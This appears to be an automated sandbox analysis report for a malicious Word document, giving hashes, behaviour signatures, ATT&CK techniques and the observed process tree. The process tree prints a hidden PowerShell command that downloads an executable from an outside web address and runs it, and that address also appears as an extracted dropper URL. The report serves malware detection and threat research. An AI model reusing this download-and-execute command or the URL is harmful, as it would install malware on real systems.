Analysis

  • max time kernel
    109s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-07-2021 09:08

General

  • Target

    27-07-2021/27-07-2021/ETL_013265_601_0758.doc

  • Size

    114KB

  • MD5

    a35d5eec842a0785f5b461da949b00cb

  • SHA1

    fec56ecc489b226da672ecd31428a568b3e9dd2b

  • SHA256

    1f2a609fdb89b7fda367578568a00f9739105c8a01202fd7c8784515be4bdd35

  • SHA512

    fe60851ff0f43f0f55aac199dbe53a4de8a28e34732a4d83cca2d9f9820141f5dfbbfd7e5973e4c4226a16e1f4962395c9a97015dabe86a817f6970c2777ff82

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://lifestyledrinks.hu/wp-includes/cs3/ETL_013265_601_0758.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27-07-2021\27-07-2021\ETL_013265_601_0758.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\buildingsociety.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w h Start-BitsTransfer -Source http://lifestyledrinks.hu/wp-includes/cs3/ETL_013265_601_0758.exe -Destination C:\Users\Public\Documents\factfriend.exe;C:\Users\Public\Documents\factfriend.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2732

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\Documents\buildingsociety.bat
    MD5

    8ce32d29b2af7ed32efc563dee9903cf

    SHA1

    18d67217f1e8a07a311175a274a753a0af4b9f7b

    SHA256

    10f02361c25228a08242b6ddfd33e8b48ed0a647fe9d699ae5a8f55cd1a86573

    SHA512

    dfc9080e48c115d85a263db1375cbed73405e27e402e995f2b6dc88028d62e344870325bd139c2d8fb9861a3a856e7133fb48724caaa81d000ea528b9e7a47cc

  • memory/2252-230-0x0000000000000000-mapping.dmp
  • memory/2732-352-0x000001B16E710000-0x000001B16E711000-memory.dmp
    Filesize

    4KB

  • memory/2732-412-0x000001B16E2A8000-0x000001B16E2A9000-memory.dmp
    Filesize

    4KB

  • memory/2732-403-0x000001B16E2A6000-0x000001B16E2A8000-memory.dmp
    Filesize

    8KB

  • memory/2732-391-0x000001B16E760000-0x000001B16E761000-memory.dmp
    Filesize

    4KB

  • memory/2732-291-0x000001B16E2A3000-0x000001B16E2A5000-memory.dmp
    Filesize

    8KB

  • memory/2732-289-0x000001B16E2A0000-0x000001B16E2A2000-memory.dmp
    Filesize

    8KB

  • memory/2732-271-0x000001B16E9A0000-0x000001B16E9A1000-memory.dmp
    Filesize

    4KB

  • memory/2732-264-0x000001B16E230000-0x000001B16E231000-memory.dmp
    Filesize

    4KB

  • memory/2732-255-0x0000000000000000-mapping.dmp
  • memory/4056-115-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-116-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-123-0x00007FF83F4C0000-0x00007FF8413B5000-memory.dmp
    Filesize

    31.0MB

  • memory/4056-122-0x00007FF8413C0000-0x00007FF8424AE000-memory.dmp
    Filesize

    16.9MB

  • memory/4056-114-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-118-0x00007FF846470000-0x00007FF848F93000-memory.dmp
    Filesize

    43.1MB

  • memory/4056-119-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-117-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-463-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-464-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-465-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB

  • memory/4056-466-0x00007FF8256F0000-0x00007FF825700000-memory.dmp
    Filesize

    64KB